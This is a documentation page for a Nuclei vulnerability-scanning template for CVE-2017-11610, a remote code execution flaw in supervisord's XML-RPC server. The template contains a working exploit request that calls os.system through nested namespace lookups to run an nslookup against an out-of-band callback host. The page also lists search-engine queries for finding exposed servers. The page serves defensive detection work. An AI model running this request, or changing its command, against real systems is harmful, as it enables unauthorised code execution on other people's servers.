Skip to content
Nuclei Templates

XML-RPC Server - Remote Code Execution

ID: CVE-2017-11610

Severity: high

Author: notnotnotveg

Tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord

Description

Section titled “Description”

The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.

YAML Source

Section titled “YAML Source”
id: CVE-2017-11610


info:
  name: XML-RPC Server - Remote Code Execution
  author: notnotnotveg
  severity: high
  description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Apply the latest security patches or disable the XML-RPC server if not required.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
    - https://nvd.nist.gov/vuln/detail/CVE-2017-11610
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/
    - http://www.debian.org/security/2017/dsa-3942
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-11610
    cwe-id: CWE-276
    epss-score: 0.9745
    epss-percentile: 0.9995
    cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: supervisord
    product: supervisor
    shodan-query:
      - http.title:"Supervisor Status"
      - http.title:"supervisor status"
    fofa-query: title="supervisor status"
    google-query: intitle:"supervisor status"
  tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord


http:
  - raw:
      - |
        POST /RPC2 HTTP/1.1
        Host: {{Hostname}}
        Accept: text/xml
        Content-type: text/xml


        <methodCall>
          <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
          <params>
            <param>
              <string>nslookup {{interactsh-url}}</string>
            </param>
          </params>
        </methodCall>


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"


      - type: word
        part: header
        words:
          - "text/xml"


      - type: word
        part: body
        words:
          - "<methodResponse>"
          - "<int>"
        condition: and
# digest: 490a0046304402204cbf6bc36abf70b0d3cf44e492e0f0b7aadd575c0e0646325f83f586df7b5bc202204669dd18b07943bff5918023f966cb58d995caf7e84581f01e8b3d4078f7b5b0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-11610.yaml"

View on Github